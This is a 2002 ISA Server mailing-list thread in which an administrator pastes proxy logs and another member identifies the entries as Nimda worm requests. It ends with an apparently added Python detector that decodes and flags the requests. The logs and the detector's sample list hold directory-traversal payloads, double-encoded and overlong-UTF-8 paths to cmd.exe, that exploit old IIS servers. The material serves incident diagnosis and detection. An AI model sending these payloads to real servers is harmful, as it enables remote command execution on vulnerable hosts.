Re: ISA logs.

  • From: Vinaykumar G <G.Vinay@xxxxxxxxx>
  • To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
  • Date: Wed, 27 Feb 2002 22:37:29 -0800

Hi Jim,
       I did not find these kinds of entries in the IIS logs. In the ISA logs, for
other entries I find the source address as 10.3.x.x, which is my internal network, but for these
entries containing the scripts I find the IP address coming from 202.x.x.x, which is valid on the
Internet, so I am getting these requests from the Internet to my ISA.
Is someone trying to send these scripts to my IIS behind ISA? I have scanned
IIS and other servers on my network for Nimda but did not find anything.

Regards,
vinay.

-----Original Message-----
From: Jim Harrison [mailto:jim@xxxxxxxxxxxx]
Sent: Tuesday, February 26, 2002 8:03 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] Re: ISA logs.


http://www.ISAserver.org


Those are Nimda requests.
Since the sc-result code is 401 for all of them, it appears that ISA may be
allowing them to pass.
"401" could be coming from ISA or the IIS service.
What entries do you find in the IIS logs?

Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!

----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Sunday, February 24, 2002 19:44
Subject: [isalist] ISA logs.


Hi Jim,
       This is what I am getting in the ISA logs. I have denoted
xxx.xxx.xx.xx as pointing to some valid IP on the Internet. If the IP is a
valid one on the Internet, then these scripts are coming from the Internet.
Please confirm what has to be done to stop these scripts being executed.

xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04
w3proxy ISA - www - - - 145 3518 http
TCP GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:08 w3proxy
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:11 w3proxy anonymous
- N 2002-02-23 05:57:11 w3proxy ISA - www
- - - 97 3518 http TCP GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13
w3proxy ISA - www - - - 98 3518 http
TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
-
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17
w3proxy ISA - www - - - 100 3518 http
TCP GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -

Regards,
vinay.


------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
jim@xxxxxxxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')
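The nine requests in the log above all aim at the same thing once decoded, which is why a detector should match on the canonical path rather than on the raw string. The following is an added example, not code from the list, from ISA or from IIS: it rejoins the wrapped URLs, decodes each path the way a lenient server decoder would (the overlong %c0%af / %c1%9c folding is a model written for this demo, and the index.asp request is a constructed benign control), and flags paths that climb above the web root or end in cmd.exe.

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Request URLs copied from the quoted ISA log (wrapped lines rejoined), plus one constructed benign request.
SAMPLE_URLS = [
    "http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/index.asp?id=5",  # constructed benign control
]
MAX_PASSES = 3  # %25%35%63 settles after two passes; the third confirms the fixed point

def fold_overlong(raw: bytes) -> bytes:
    """Model (assumption for this demo) of a lenient two-byte UTF-8 decode: low 5 bits of a
    0xC0/0xC1 lead byte plus low 6 bits of the next byte, with no shortest-form or trail-byte
    check. 0xC0/0xC1 never lead a valid UTF-8 sequence, so real text is left untouched."""
    fold = lambda m: bytes([((m.group(1)[0] & 0x1F) << 6) | (m.group(2)[0] & 0x3F)])
    return re.sub(rb"([\xc0\xc1])(.)", fold, raw, flags=re.DOTALL)

def normalize(url: str) -> tuple[str, int]:
    """Percent-decode the path until it stops changing; return the canonical forward-slash
    path and the number of passes needed (2 means double encoded). unquote_to_bytes leaves
    malformed escapes such as '%%' alone, which is what lets '%%35%63' become '%5c' first."""
    current, passes = urlsplit(url).path.encode("latin-1"), 0
    for _ in range(MAX_PASSES):
        decoded = fold_overlong(unquote_to_bytes(current))
        if decoded == current:
            break
        current, passes = decoded, passes + 1
    return current.replace(b"\\", b"/").decode("latin-1"), passes

def escapes_root(canon: str) -> bool:
    """True when '..' segments climb above the web root at any point."""
    depth = 0
    for seg in canon.split("/"):
        depth += -1 if seg == ".." else (seg not in ("", "."))  # '..' pops, a real name pushes
        if depth < 0:
            return True
    return False

def classify(url: str) -> dict:
    canon, passes = normalize(url)
    return {"url": url, "canonical": canon, "decode_passes": passes,
            "escapes_root": escapes_root(canon), "shell": canon.lower().endswith("/cmd.exe")}
```

Running `classify` over `SAMPLE_URLS` marks the first nine as root escapes ending in cmd.exe (the %255c and %25%35%63 forms need two decode passes, the %c0/%c1 forms one) and leaves the index.asp request clean.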


